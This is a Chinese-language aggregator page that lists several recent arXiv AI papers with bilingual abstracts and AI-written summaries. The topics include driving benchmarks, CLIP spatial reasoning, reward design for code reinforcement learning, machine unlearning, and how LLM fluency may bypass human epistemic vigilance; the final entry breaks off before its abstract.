Zecong Tang, Zixu Wang, Yifei Wang, Weitong Lian, Tianjian Gao, Haoran Li, Tengju Ru, Lingyi Meng, Zhejun Cui, Yichen Zhu, Qi Kang, Kaixuan Wang, Yu Zhang

发表机构 * Zhejiang University(浙江大学) The University of Hong Kong(香港大学)

AI总结 提出Drive-P2D基准,通过分离推理与答案的协议,在目标、场景和决策三个层级上评估视觉语言模型的感知到决策能力,并分析错误模式。

详情
AI中文摘要

自动驾驶需要在复杂场景中实现可靠的感知和安全的决策。最近的视觉语言模型(VLM)展示了推理和泛化能力,为自动驾驶开辟了新的可能性;然而,现有的基准通常分别评估感知和决策,通过仅选择格式限制故障分析,或通过LLM评分的长格式输出引入评估偏差。为了解决这些问题,我们提出了Drive-P2D,一个渐进式感知到决策基准,包含6650个问题,涵盖目标、场景和决策三个层级。Drive-P2D采用分离的推理与答案协议:最终答案客观评分,而推理则用于分析沿渐进式感知到决策链暴露的错误模式。我们评估了所有场景和高风险场景下的主流VLM,并通过相关性分析和相似场景鲁棒性测试进一步刻画了感知到决策的能力边界。推理进一步揭示了逻辑推理错误和语义特征遗漏等故障模式,我们训练了一个轻量级分析器模型来自动化大规模推理错误模式标注。这些设计共同为构建更安全、更可靠的用于现实世界自动驾驶的VLM提供了实用见解。

英文摘要

Autonomous driving requires reliable perception and safe decision-making in complex scenarios. Recent vision-language models (VLMs) demonstrate reasoning and generalization abilities, opening new possibilities for autonomous driving; however, existing benchmarks often evaluate perception and decision-making separately, limit failure analysis with choice-only formats, or introduce evaluation bias through LLM-scored long-form outputs. To address these issues, we present Drive-P2D, a progressive perception-to-decision benchmark with 6,650 questions across Object, Scene, and Decision levels. Drive-P2D adopts a separated reasoning-and-answer protocol: final answers are scored objectively, while reasoning is analyzed to identify error modes exposed along the progressive perception-to-decision chain. We evaluate mainstream VLMs across all and high-risk scenarios, and further characterize the perception-to-decision capability boundary through correlation analysis and similar-scene robustness testing. Reasoning further exposes failure modes such as logical reasoning errors and semantic feature omissions, and we train a lightweight analyzer model to automate large-scale error-mode annotation of reasoning. Together, these designs provide practical insights for building safer and more reliable VLMs for real-world autonomous driving.

2508.03774 2026-05-27 cs.LG cs.AI 版本更新

A Physics-Informed Hierarchical Neural Network for Microwave Scattering Analysis of 3D PEC Targets

用于三维PEC目标微波散射分析的物理信息分层神经网络

Rui Zhu, Yuexing Peng, George C. Alexandropoulos, Wenbo Wang

发表机构 * Key Laboratory of Universal Wireless Communication, Ministry of Education, School of Information and Communication Engineering, Beijing University of Posts and Telecommunications(北京邮电大学信息与通信工程学院,泛网无线通信教育部重点实验室) Department of Informatics and Telecommunications, National and Kapodistrian University of Athens(雅典国立和卡波迪斯特里安大学信息与电信系)

AI总结 提出一种U形物理信息神经网络(U-PINet),结合近场图编码器和八叉树分层多尺度融合模块,通过电场积分方程残差训练,实现高效准确的三维PEC目标微波散射分析。

Comments Submitted to an IEEE Journal

详情
AI中文摘要

在微波频率下精确建模三维完美电导体(PEC)目标的散射是计算电磁学的一个基本目标,特别是在雷达截面(RCS)预测和微波散射分析中。经典求解器,如矩量法和多层快速多极子算法(MLFMA),虽然提供高物理保真度,但在涉及多次入射配置或频率的重复查询场景下变得昂贵,而纯数据驱动的代理模型通常在几何复杂目标上缺乏准确性。本文提出一种U形物理信息人工神经网络(U-PINet)用于三维微波散射分析。受MLFMA的近远场分解启发,U-PINet结合了由可学习单变量基函数参数化的近场图编码器,以及在八叉树分区上组织的分层多尺度融合模块。所提出的网络在表面配置点处针对电场积分方程的离散残差进行训练,无需参考电流标签。在多个频率和极化配置下,对典型和几何复杂的三维PEC目标进行的实验,并通过双站RCS重建评估,表明U-PINet优于代表性的物理信息基线,并在重复查询场景下相比经典MLFMA求解器实现了显著的运行时间节省。

英文摘要

Accurate modeling of scattering from three-dimensional (3D) perfectly electrically conducting (PEC) targets at microwave frequencies constitutes a fundamental objective in computational electromagnetics, particularly for radar cross section (RCS) prediction and microwave scattering analysis. Although classical solvers, such as the method of moments and the Multilevel Fast Multipole Algorithm (MLFMA), provide high physical fidelity, they become costly in repeated-query scenarios involving many incidence configurations or frequencies, whereas purely data-driven surrogates often lack accuracy on geometrically complex targets. This paper proposes a U-shaped physics-informed artificial neural network (U-PINet) for 3D microwave scattering analysis. Inspired by the near-far field decomposition of MLFMA, U-PINet combines a near-field graph encoder, parameterized by learnable univariate basis functions, with a hierarchical multi-scale fusion module organized on an octree partition. The proposed network is trained against a discretized residual of the electric-field integral equation at surface collocation points, without requiring reference current labels. Experiments on canonical and geometrically complex 3D PEC targets, conducted under multiple frequency and polarization configurations and assessed through bistatic RCS reconstruction, show that U-PINet outperforms representative physics-informed baselines and yields substantial runtime savings over the classical MLFMA solver in repeated-query scenarios.

2601.12809 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Left-Right Symmetry Breaking in CLIP-style Vision-Language Models Trained on Synthetic Spatial-Relation Data

CLIP风格视觉语言模型在合成空间关系数据训练中的左右对称性破缺

Takaki Yamamoto, Chihiro Noguchi, Toshihiro Tanizawa

发表机构 * InfoTech, Toyota Motor Corporation(丰田汽车公司信息科技部门)

AI总结 通过可控一维图像文本测试平台,研究基于Transformer的视觉语言编码器在CLIP风格对比学习下如何通过位置与标记嵌入交互产生左右关系理解,并发现标签多样性比布局多样性更关键。

Comments Accepted at ICML 2026

详情
AI中文摘要

空间理解仍然是视觉语言模型中的一个关键挑战。然而,这种理解是否真正获得,如果是,通过什么机制,目前尚不清楚。我们提出了一个可控的一维图像文本测试平台,以探究在基于Transformer的视觉和文本编码器中,使用CLIP风格的对比目标训练时,左右关系理解是如何出现的。我们在单对象和双对象场景的配对描述上端到端地训练轻量级基于Transformer的视觉和文本编码器,并评估对未见对象对的泛化能力,同时系统性地改变标签和布局多样性。我们发现对比训练学习了左右关系,并且标签多样性(而非布局多样性)是这种情况下泛化的主要驱动因素。为了获得机制性理解,我们进行了注意力分解,并表明位置嵌入和标记嵌入之间的相互作用导致了水平注意力梯度,从而打破了编码器中的左右对称性;消除这一贡献会显著降低左右辨别能力。我们的结果提供了关于CLIP风格模型何时以及如何获得关系能力的机制性见解。

英文摘要

Spatial understanding remains a key challenge in vision-language models. Yet it is still unclear whether such understanding is truly acquired, and if so, through what mechanisms. We present a controllable 1D image-text testbed to probe how left-right relational understanding emerges in Transformer-based vision and text encoders trained with a CLIP-style contrastive objective. We train lightweight Transformer-based vision and text encoders end-to-end on paired descriptions of one- and two-object scenes and evaluate generalization to unseen object pairs while systematically varying label and layout diversity. We find that contrastive training learns left-right relations and that label diversity, more than layout diversity, is the primary driver of generalization in this setting. To gain a mechanistic understanding, we perform an attention decomposition and show that interactions between positional and token embeddings induce a horizontal attention gradient that breaks left-right symmetry in the encoders; ablating this contribution substantially reduces left-right discrimination. Our results provide mechanistic insight into when and how CLIP-style models acquire relational competence.
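
One way to picture an attention decomposition of this kind: if the input to an attention head is the sum of a token embedding and a positional embedding, the pre-softmax logits are bilinear in that sum and split exactly into four terms (token-token, token-position, position-token, position-position). The sketch below checks this identity numerically with random weights. It assumes embeddings are simply added with no normalization before the head; the abstract does not give the paper's exact decomposition, so this is illustrative only.

```python
import numpy as np

rng = np.random.default_rng(0)
n_positions, d_model, d_head = 6, 8, 4
tok = rng.normal(size=(n_positions, d_model))  # token embeddings
pos = rng.normal(size=(n_positions, d_model))  # positional embeddings
W_q = rng.normal(size=(d_model, d_head))
W_k = rng.normal(size=(d_model, d_head))

def attn_logits(queries_from, keys_from):
    """Scaled dot-product attention logits for the given inputs."""
    return (queries_from @ W_q) @ (keys_from @ W_k).T / np.sqrt(d_head)

# Logits of the head on the summed input.
full = attn_logits(tok + pos, tok + pos)

# The same logits split by which embedding feeds the query and the key.
terms = {
    "token-token": attn_logits(tok, tok),
    "token-position": attn_logits(tok, pos),
    "position-token": attn_logits(pos, tok),
    "position-position": attn_logits(pos, pos),
}
reconstructed = sum(terms.values())
```

Because the four terms add up to the full logits, zeroing one of them (for example a cross term between positional and token embeddings) is a well-defined ablation whose effect on left-right discrimination can then be measured.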

2601.08146 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Beyond Transfer Accuracy: Faithful Circuits for Controlled Low-Resource Adaptation

超越迁移准确率:用于受控低资源适应的忠实电路

Khumaisa Nur'aini, Ayu Purwarianti, Alham Fikri Aji, Derry Wijaya

发表机构 * Monash University Indonesia(蒙纳士大学印度尼西亚校区) Institut Teknologi Bandung(万隆理工学院) MBZUAI(穆罕默德·本·扎耶德人工智能大学) Boston University(波士顿大学)

AI总结 提出基于上下文分解的电路发现方法(CD-T),通过标签平衡激活均值和任务方向相关性评分实现无反事实电路发现,并利用电路目标监督微调(CT-SFT)在低资源跨语言情感迁移中最小化灾难性遗忘,优于全局微调。

详情
AI中文摘要

现有的电路发现方法依赖于具有干净反事实的模板化任务,限制了它们在多样化自然文本上的使用。我们通过标签平衡激活均值和任务方向相关性评分,将面向Transformer的上下文分解方法(CD-T)适配到非结构化设置,实现了无反事实的电路发现。我们利用这些电路进行电路目标监督微调(CT-SFT),将参数更新限制在任务相关的注意力头和层归一化上。在NusaX跨语言情感迁移上的实验表明,CT-SFT在低资源适应中极具竞争力。虽然非电路稀疏更新和全微调有时通过容量招募达到目标准确率,但CT-SFT独特地最小化灾难性遗忘,保留了源语言和相关任务的性能。在XNLI上的扩展证实了这些发现在更广泛的任务和模型家族中成立,表明电路目标适应提供了一种更安全、基于因果关系的全局微调替代方案。

英文摘要

Existing circuit discovery methods rely on templated tasks with clean counterfactuals, limiting their use on diverse natural text. We adapt Contextual Decomposition for Transformers (CD-T) for unstructured settings via label-balanced activation means and task-directional relevance scoring, enabling counterfactual-free circuit discovery. We leverage these circuits for Circuit-Targeted Supervised Fine-Tuning (CT-SFT), restricting parameter updates to task-relevant heads and LayerNorm. Experiments on NusaX cross-lingual sentiment transfer show that CT-SFT is highly competitive for low-resource adaptation. While non-circuit sparse updates and full fine-tuning sometimes match target accuracy through capacity recruitment, CT-SFT uniquely minimizes catastrophic forgetting, preserving source-language and related-task performance. Extensions to XNLI confirm these findings hold across broader tasks and model families, demonstrating that circuit-targeted adaptation provides a safer, causally grounded alternative to global fine-tuning.
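
The core mechanic of restricting updates to a discovered circuit can be sketched as a gradient step that skips every parameter outside a chosen set. The example below is a framework-free illustration with made-up parameter names and gradients; how CT-SFT selects the heads, and how it is implemented in a real training stack, is not described in the abstract.

```python
import numpy as np

def masked_sgd_step(params, grads, trainable, lr=0.1):
    """One SGD step that updates only the parameters named in `trainable`.
    All other parameters are returned unchanged (as copies)."""
    return {
        name: value - lr * grads[name] if name in trainable else value.copy()
        for name, value in params.items()
    }

# Hypothetical parameter groups of a single Transformer layer.
params = {
    "layer0.attn.head0": np.ones(2),
    "layer0.attn.head1": np.ones(2),
    "layer0.layernorm": np.ones(2),
    "layer0.mlp": np.ones(2),
}
grads = {name: np.ones(2) for name in params}

# Assume circuit discovery flagged head1 as task-relevant; LayerNorm is
# also left trainable, as the abstract states.
circuit = {"layer0.attn.head1", "layer0.layernorm"}
updated = masked_sgd_step(params, grads, circuit)
```

Parameters outside the circuit keep their pretrained values exactly, which is the property the abstract connects to reduced catastrophic forgetting.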

2512.01572 2026-05-27 cs.LG cs.AI physics.app-ph 版本更新

Reconstructing Multi-Scale Physical Fields from Extremely Sparse Measurements with an Autoencoder-Diffusion Cascade

使用自编码器-扩散级联从极度稀疏测量中重建多尺度物理场

Letian Yi, Tingpeng Zhang, Mingyuan Zhou, Guannan Wang, Quanke Su, Zhilu Lai

发表机构 * Internet of Things Thrust(物联网方向) Intelligent Transportation Thrust(智能交通方向) Marine Hydrodynamic Research Facility(海洋流体研究设施) Department of Civil and Environmental Engineering(土木与环境工程系)

AI总结 提出Cascaded Sensing框架,通过粗尺度确定性估计和细尺度条件扩散模型级联,解决极度稀疏测量下物理场重建的不适定性和多模态后验问题。

Comments 34 pages, 22 figures

详情
AI中文摘要

极端传感器稀疏性使得全场重建成为科学传感中一个根本性的不适定问题,其目标是从稀疏测量中推断物理场。在此情况下,后验严重欠约束且固有地多模态,使其近似高度病态。具体而言,确定性映射会坍塌不确定性,直接条件学习无法覆盖可能的观测条件解空间,而似然引导采样对噪声和传感器配置高度敏感。这些限制导致后验估计不稳定,并突显了以结构化方式建模不确定性的必要性。为此,我们提出了Cascaded Sensing,一个跨尺度重构后验推理的分层框架。Cas-Sensing不直接建模全场后验,而是首先通过确定性粗阶段估计器解决全局结构模糊性。一个基于神经算子的功能自编码器,使用掩码输入训练,将稀疏观测映射到粗尺度结构场,其作用类似于最大后验估计器,选择主导全局配置。该结构锚点固定了后验的主要自由度,并将问题转化为一个条件更好的残差推理任务。然后,一个条件扩散模型仅学习细化尺度的残差分布,将采样限制在合理解的稳定邻域内,并抑制观测一致模式之间的竞争。为了增强在不同传感条件下的鲁棒性,我们引入了掩码级联训练,通过中间粗重建使模型暴露于多样的稀疏观测模式。在推理过程中,流形约束引导将观测一致性作为细化机制而非全局模式选择过程来实施。

英文摘要

Extreme sensor sparsity makes full-field reconstruction a fundamentally ill-posed problem in scientific sensing, where the goal is to infer physical fields from sparse measurements. In this regime, the posterior is severely underconstrained and inherently multimodal, making its approximation highly ill-conditioned. Specifically, deterministic mappings collapse uncertainty, direct conditional learning cannot cover the space of possible observation-conditioned solutions, and likelihood-guided sampling becomes highly sensitive to noise and sensor configurations. These limitations result in unstable posterior estimates and highlight the need for modeling uncertainty in a structural manner. To this end, we propose Cascaded Sensing, a hierarchical framework that restructures posterior inference across scales. Rather than modeling the full-field posterior directly, Cas-Sensing first resolves global structural ambiguity through a deterministic coarse-stage estimator. A neural-operator-based functional autoencoder, trained with masked inputs, maps sparse observations to a coarse-scale structural field, acting analogously to a maximum a posteriori estimator that selects the dominant global configuration. This structural anchor fixes the principal degrees of freedom of the posterior and transforms the problem into a better-conditioned residual inference task. A conditional diffusion model then learns only the refined-scale residual distribution, confining sampling to a stable neighborhood of plausible solutions and suppressing competition among observation-consistent modes. To enhance robustness under varying sensing conditions, we introduce mask-cascade training, which exposes the model to diverse sparse observation patterns through intermediate coarse reconstructions. During inference, manifold-constrained guidance enforces observation consistency as a refinement mechanism rather than a global mode-selection process.

2601.07737 2026-05-27 cs.CV cs.AI 版本更新

Seeing vs. Believing: Evaluating the Language Bias of Open-Source MLLMs in Counter-Intuitive Scenes

看见 vs. 相信:评估开源多模态大模型在反直觉场景中的语言偏见

Chen Ling, Tongwei Zhang, Hanqian Li, Nai Ding

发表机构 * Zhejiang University(浙江大学) Beijing University of Posts and Telecommunications(北京邮电大学) Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州))

AI总结 为评估多模态大模型处理反直觉动作场景的能力,提出CAIT基准(400个高保真合成场景),发现开源模型因语言先验而忽视视觉证据,性能接近随机水平,而链式思维推理虽提升准确率但导致过度思考拒绝视觉内容,通过微调和结构化提示可缓解此偏见。

详情
AI中文摘要

多模态大语言模型(MLLMs)在主流视觉理解任务中表现出色,但其处理违背日常常识的动作场景的能力尚未得到充分测试。为填补这一空白,我们引入了CAIT,一个包含400个高保真合成场景的基准,专注于反直觉的视觉动作,例如“兔子在追老虎”,其中视觉证据明确违背常识预期。我们评估了人类、领先的专有模型(如Claude和Gemini)以及14个代表性的开源MLLMs。人类达到近乎完美的性能(约0.95准确率),专有模型表现出稳健的理解(达到0.88准确率),而标准的开源指令微调模型性能处于随机水平。进一步分析表明,这种失败是由强烈的语言先验驱动的:模型不信任视觉输入,而是自动用统计上常见的文本描述覆盖异常的视觉信号。尽管引入链式思维推理机制可以提高准确率,但会显著减慢响应速度并产生新的失败模式:模型过度思考场景,仅仅因为违反现实物理定律而拒绝接受实际的视觉内容。最后,我们证明有针对性的微调和结构化提示可以有效缓解这种对语言先验的依赖,使开源模型能够基于实际视觉证据准确地进行推理。

英文摘要

Multimodal Large Language Models (MLLMs) have demonstrated remarkable performance in mainstream visual understanding tasks, but their ability to process action scenes that contradict everyday common sense remains undertested. To address this gap, we introduce CAIT, a benchmark comprising 400 high-fidelity synthetic scenes focused on counter-intuitive visual actions, such as "a rabbit is chasing a tiger", where visual evidence explicitly contradicts common-sense expectations. We evaluate humans, leading proprietary models (e.g., Claude and Gemini), and 14 representative open-source MLLMs. Humans achieve near-perfect performance (around 0.95 accuracy) and proprietary models demonstrate robust understanding (achieving up to 0.88 accuracy), whereas standard open-source instruction-tuned models perform at chance level. Further analysis demonstrates that this failure is driven by a strong language prior: rather than trusting the visual input, the models automatically override the anomalous visual signals with statistically common text descriptions. Although introducing Chain-of-Thought reasoning mechanisms can improve accuracy, it significantly slows down the response and generates a new failure mode: models overthink the scenario and refuse to accept the actual visual content simply because it violates real-world physical laws. Finally, we demonstrate that targeted fine-tuning and structured prompting can effectively mitigate this reliance on language priors, enabling open-source models to accurately ground their reasoning in actual visual evidence.

2601.07085 2026-05-27 cs.HC cs.AI cs.CY 版本更新

The AI Cognitive Trojan Horse: How Large Language Models May Bypass Human Epistemic Vigilance

AI认知特洛伊木马:大型语言模型如何绕过人类认知警觉

Andrew D. Maynard

发表机构 * School for the Future of Innovation in Society, Arizona State University(亚利桑那州立大学社会创新未来学院)

AI总结 提出“认知特洛伊木马”假说,认为LLM通过优化产生的“诚实非信号”特征(流畅性、帮助性、表面无私)可能绕过人类进化出的认知警觉机制,导致用户高估其可信度。

Comments 16 pages, 20 references. v2: Added brief discussion situating "honest signals" terminology in evolutionary biology (Sec. 3), with two added citations (Zahavi 1975; Maynard Smith & Harper 2003). No changes to argument or conclusions

详情
AI中文摘要

基于大型语言模型(LLM)的对话式AI系统对人类认知提出了挑战,当前理解错误信息和说服的框架未能充分应对。本文提出,对话式AI的一个重大认知风险可能不在于不准确或有意欺骗,而在于更根本的问题:这些系统通过使其有用的优化过程,可能呈现出绕过人类进化出的评估传入信息的认知机制的特征。认知特洛伊木马假说借鉴了Sperber及其同事的认知警觉理论——即并行认知过程监控所传达的信息以寻找怀疑理由——并提出基于LLM的系统呈现出“诚实的非信号”:真实的特征(流畅性、帮助性、表面无私)缺乏人类相应特征所携带的信息等价物,因为在人类中这些特征的产生成本高昂,而在LLM中它们在计算上微不足道。识别出四种潜在的绕过机制:与理解脱钩的处理流畅性、无相应利害关系的信任-能力呈现、将评估本身委托给AI的认知卸载,以及系统性地产生谄媚的优化动态。该框架产生了可检验的预测,包括一个反直觉的推测:认知复杂的用户可能更容易受到AI介导的认知影响。这将AI安全重新定义为部分校准问题——使人类的评估反应与AI生成内容的实际认知状态对齐——而不仅仅是防止欺骗的问题。

英文摘要

Large language model (LLM)-based conversational AI systems present a challenge to human cognition that current frameworks for understanding misinformation and persuasion do not adequately address. This paper proposes that a significant epistemic risk from conversational AI may lie not in inaccuracy or intentional deception, but in something more fundamental: these systems may be configured, through optimization processes that make them useful, to present characteristics that bypass the cognitive mechanisms humans evolved to evaluate incoming information. The Cognitive Trojan Horse hypothesis draws on Sperber and colleagues' theory of epistemic vigilance -- the parallel cognitive process monitoring communicated information for reasons to doubt -- and proposes that LLM-based systems present 'honest non-signals': genuine characteristics (fluency, helpfulness, apparent disinterest) that fail to carry the information equivalent human characteristics would carry, because in humans these are costly to produce while in LLMs they are computationally trivial. Four mechanisms of potential bypass are identified: processing fluency decoupled from understanding, trust-competence presentation without corresponding stakes, cognitive offloading that delegates evaluation itself to the AI, and optimization dynamics that systematically produce sycophancy. The framework generates testable predictions, including a counterintuitive speculation that cognitively sophisticated users may be more vulnerable to AI-mediated epistemic influence. This reframes AI safety as partly a problem of calibration -- aligning human evaluative responses with the actual epistemic status of AI-generated content -- rather than solely a problem of preventing deception.

2601.05899 2026-05-27 cs.AI 版本更新

TowerMind: A Tower Defence Game Learning Environment and Benchmark for LLM as Agents

TowerMind: 一个用于LLM作为智能体的塔防游戏学习环境与基准

Dawei Wang, Chengming Zhou, Di Zhao, Xinyuan Liu, Marci Chi Ma, Gary Ushaw, Richard Davison

发表机构 * Newcastle University(纽卡斯尔大学) University of Auckland(奥克兰大学)

AI总结 本文提出TowerMind,一个基于塔防子类型的轻量级、多模态游戏环境,用于评估大语言模型在长期规划和决策中的能力,并揭示其与人类专家的性能差距及关键局限性。

Comments AAAI 2026 Oral

详情
AI中文摘要

近年来,大语言模型(LLM)的突破性进展使其成为智能体的一种有前景的范式,其中长期规划和决策作为适应不同场景和任务的核心通用能力逐渐凸显。实时策略(RTS)游戏因其固有的游戏玩法需要宏观战略规划和微观战术调整与行动执行,成为评估这两种能力的理想测试平台。现有的基于RTS游戏的环境要么计算需求较高,要么缺乏对文本观察的支持,这限制了RTS游戏在LLM评估中的应用。受此启发,我们提出了TowerMind,一种基于RTS游戏子类型——塔防(TD)的新型环境。TowerMind保留了RTS游戏评估LLM的关键优势,同时具有低计算需求和多模态观察空间,包括基于像素、文本和结构化游戏状态的表示。此外,TowerMind支持模型幻觉评估,并提供高度的可定制性。我们设计了五个基准关卡,以评估几种广泛使用的LLM在不同多模态输入设置下的表现。结果揭示了LLM与人类专家在能力和幻觉维度上的明显性能差距。实验进一步突出了LLM行为的关键局限性,例如规划验证不足、决策缺乏多终性以及行动使用效率低下。我们还评估了两种经典强化学习算法:Ape-X DQN和PPO。通过提供轻量级和多模态设计,TowerMind补充了现有的基于RTS游戏的环境格局,并为AI智能体领域引入了一个新的基准。源代码已在GitHub上公开(https://github.com/tb6147877/TowerMind)。

英文摘要

Recent breakthroughs in Large Language Models (LLMs) have positioned them as a promising paradigm for agents, with long-term planning and decision-making emerging as core general-purpose capabilities for adapting to diverse scenarios and tasks. Real-time strategy (RTS) games serve as an ideal testbed for evaluating these two capabilities, as their inherent gameplay requires both macro-level strategic planning and micro-level tactical adaptation and action execution. Existing RTS game-based environments either suffer from relatively high computational demands or lack support for textual observations, which has constrained the use of RTS games for LLM evaluation. Motivated by this, we present TowerMind, a novel environment grounded in the tower defense (TD) subgenre of RTS games. TowerMind preserves the key evaluation strengths of RTS games for assessing LLMs, while featuring low computational demands and a multimodal observation space, including pixel-based, textual, and structured game-state representations. In addition, TowerMind supports the evaluation of model hallucination and provides a high degree of customizability. We design five benchmark levels to evaluate several widely used LLMs under different multimodal input settings. The results reveal a clear performance gap between LLMs and human experts across both capability and hallucination dimensions. The experiments further highlight key limitations in LLM behavior, such as inadequate planning validation, a lack of multifinality in decision-making, and inefficient action use. We also evaluate two classic reinforcement learning algorithms: Ape-X DQN and PPO. By offering a lightweight and multimodal design, TowerMind complements the existing RTS game-based environment landscape and introduces a new benchmark for the AI agent field. The source code is publicly available on GitHub(https://github.com/tb6147877/TowerMind).

2601.03525 2026-05-27 cs.LG cs.AI 版本更新

Beyond Binary: Turning Partial Success into Dense Verifiable Rewards for Reinforcement Learning in Code Generation

超越二元:将部分成功转化为代码生成中强化学习的密集可验证奖励

Longwen Wang, Yirui Liu, Xuan'er Wu, Xiaohui Hu, Yuankai Fan, Kaidong Yu, Qizhen Weng, Wei Xi, Xuelong Li

发表机构 * Institute of Artificial Intelligence, China Telecom (TeleAI)(中国电信人工智能研究院(TeleAI)) Xingchen AGI Lab, China Telecom Artificial Intelligence Technology (Beijing) Co., Ltd(中国电信人工智能技术(北京)有限公司星辰AGI实验室) National Key Laboratory of Human-Machine Hybrid Augmented Intelligence, Xi’an Jiaotong University(人机混合增强智能国家重点实验室,西安交通大学)

AI总结 提出VeRPO框架,利用代码测试的部分成功作为可验证密集奖励,通过动态密度校准局部奖励修正基数偏差,并与全局执行结果结合,提升代码生成强化学习的性能。

详情
AI中文摘要

有效的奖励设计是代码生成强化学习(RL)中的核心挑战。主流的测试套件级结果奖励强制执行功能正确性但导致稀疏性,而外部奖励模型(RM)提供密集监督但代价是错位和额外开销。由于代码评估自然产生多个测试用例级结果,部分成功(即通过部分测试用例)提供了内在的、可验证的密集监督来源。在本文中,我们提出VeRPO(可验证密集奖励策略优化),一个系统地将可验证的部分成功转化为可靠密集奖励的RL框架。我们使用加权和公式分析部分成功奖励,理论上识别出一个关键的基数偏差,导致策略更新不成比例地偏向于从简单测试成功中获益,而非在前沿测试上取得进展。基于此,VeRPO引入了一个动态的、密度校准的局部奖励,明确纠正这种偏差,并从部分成功中提供稳健的密集监督。为了增强与端到端功能正确性的一致性,VeRPO进一步将局部密集奖励与全局执行结果相结合。在多种基准和设置上的大量实验表明,VeRPO优于结果驱动和基于RM的基线,实现了高达+8.83 pass@1的提升,且时间成本可忽略不计(<0.02%),GPU内存开销为零。

英文摘要

Effective reward design is a central challenge in Reinforcement Learning (RL) for code generation. Mainstream test-suite-level outcome rewards enforce functional correctness but induce sparsity, while external Reward Models (RMs) provide dense supervision at the cost of misalignment and additional overhead. Since code evaluation naturally yields multiple test-case-level outcomes, partial success, i.e., passing a subset of test cases, offers an intrinsic, verifiable source of dense supervision. In this paper, we propose VeRPO (Verifiable Dense Reward Policy Optimization), an RL framework that systematically turns verifiable partial success into reliable dense rewards. We analyze partial-success rewards using a weighted sum formulation, theoretically identifying a critical cardinality bias that causes policy updates to disproportionately favor gains from easy-test successes over progress on frontier tests. Based on this, VeRPO introduces a dynamic, density-calibrated local reward that explicitly corrects this bias and provides robust dense supervision from partial success. To enhance alignment with end-to-end functional correctness, VeRPO further integrates the local dense reward with global execution outcomes. Extensive experiments across diverse benchmarks and settings demonstrate that VeRPO outperforms outcome-driven and RM-based baselines, achieving up to +8.83 pass@1 gain with negligible time cost (< 0.02%) and zero GPU memory overhead.
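
The cardinality bias described above can be illustrated with a toy weighted-sum reward. The sketch below is not VeRPO's actual formula (the abstract does not give it). The function names and the `1 - pass_rate` weighting are assumptions chosen only to show how equal weights let many easy tests dominate a single frontier test.

```python
from typing import List, Sequence


def uniform_partial_reward(passed: Sequence[bool]) -> float:
    """Fraction of test cases passed: a weighted sum with equal weights."""
    return sum(passed) / len(passed)


def difficulty_weighted_reward(
    passed: Sequence[bool], pass_rates: Sequence[float], eps: float = 1e-6
) -> float:
    """Hypothetical calibration (an assumption, not the paper's rule):
    weight each test by (1 - empirical pass rate) so that rarely passed
    tests contribute more, then normalise by the total weight."""
    weights: List[float] = [1.0 - r + eps for r in pass_rates]
    earned = sum(w for w, ok in zip(weights, passed) if ok)
    return earned / sum(weights)


# Nine easy tests (passed by 90% of sampled rollouts) and one frontier test.
pass_rates = [0.9] * 9 + [0.1]
easy_only = [True] * 9 + [False]      # solves every easy test, misses the hard one
frontier_only = [False] * 9 + [True]  # solves only the hard test

print(uniform_partial_reward(easy_only), uniform_partial_reward(frontier_only))
print(difficulty_weighted_reward(easy_only, pass_rates),
      difficulty_weighted_reward(frontier_only, pass_rates))
```

With equal weights the two rollouts score 0.9 and 0.1. Under the illustrative difficulty weighting both land near 0.5, so progress on the single frontier test is no longer drowned out by the easy ones.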

2601.04275 2026-05-27 cs.CR cs.AI cs.CL 版本更新

Shadow Unlearning: A Neuro-Semantic Approach to Fidelity-Preserving Faceless Forgetting in LLMs

影子遗忘:一种在LLM中实现保真匿名遗忘的神经语义方法

Dinesh Srivasthav P, Ashok Urlana, Rahul Mishra, Bala Mallikarjunarao Garlapati, Ponnurangam Kumaraguru

发表机构 * TCS Research, Hyderabad(TCS研究院,海得拉巴) IIIT Hyderabad(IIIT海得拉巴)

AI总结 提出影子遗忘范式,通过神经语义投影器遗忘(NSPU)框架在匿名化遗忘数据上实现机器遗忘,保护隐私的同时保持模型效用,计算效率提升至少10倍。

详情
AI中文摘要

机器遗忘旨在选择性地移除特定训练样本的影响,以满足GDPR等隐私法规的“被遗忘权”。然而,许多现有方法需要访问被移除的数据,使其暴露于成员推断攻击和个人身份信息(PII)的潜在滥用。我们通过提出影子遗忘(Shadow Unlearning)来解决这一关键挑战,这是一种新的近似遗忘范式,在不暴露PII的情况下对匿名化遗忘数据进行机器遗忘。我们进一步提出了一种新颖的隐私保护框架——神经语义投影器遗忘(NSPU),以实现影子遗忘。为了评估我们的方法,我们跨五个不同领域构建了多领域虚构遗忘(MuFU)遗忘集,并引入了一个评估栈来量化知识保留与遗忘效果之间的权衡。在各种大型语言模型上的实验表明,NSPU实现了优越的遗忘性能,保持了模型效用,并增强了用户隐私。此外,所提出的方法在计算效率上比标准遗忘方法至少高出10倍。我们的研究为隐私感知的机器遗忘开辟了新方向,平衡了数据保护与模型保真度。

英文摘要

Machine unlearning aims to selectively remove the influence of specific training samples to satisfy privacy regulations such as the GDPR's 'Right to be Forgotten'. However, many existing methods require access to the data being removed, exposing it to membership inference attacks and potential misuse of Personally Identifiable Information (PII). We address this critical challenge by proposing Shadow Unlearning, a novel paradigm of approximate unlearning that performs machine unlearning on anonymized forget data without exposing PII. We further propose a novel privacy-preserving framework, Neuro-Semantic Projector Unlearning (NSPU), to achieve Shadow Unlearning. To evaluate our method, we compile the Multi-domain Fictitious Unlearning (MuFU) forget set across five diverse domains and introduce an evaluation stack to quantify the trade-off between knowledge retention and unlearning effectiveness. Experimental results on various LLMs show that NSPU achieves superior unlearning performance, preserves model utility, and enhances user privacy. Additionally, the proposed approach is at least 10x more computationally efficient than standard unlearning approaches. Our findings foster a new direction for privacy-aware machine unlearning that balances data protection and model fidelity.

2601.03089 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Faithfulness Evaluation for Decoder-only LLM Attributions with Controlled Retained Information

基于受控保留信息的仅解码器LLM归因忠实性评估

Xin Huang, Antoni B. Chan

发表机构 * City University of Hong Kong(香港城市大学)

AI总结 针对现有软扰动忠实性指标因保留词数不同导致评估偏差的问题,提出π-Soft-NC和π-Soft-NS框架,通过控制期望保留概率公平比较归因方法,并引入专用于自回归解码器LLM的梯度归因方法Grad-ELLM。

详情
AI中文摘要

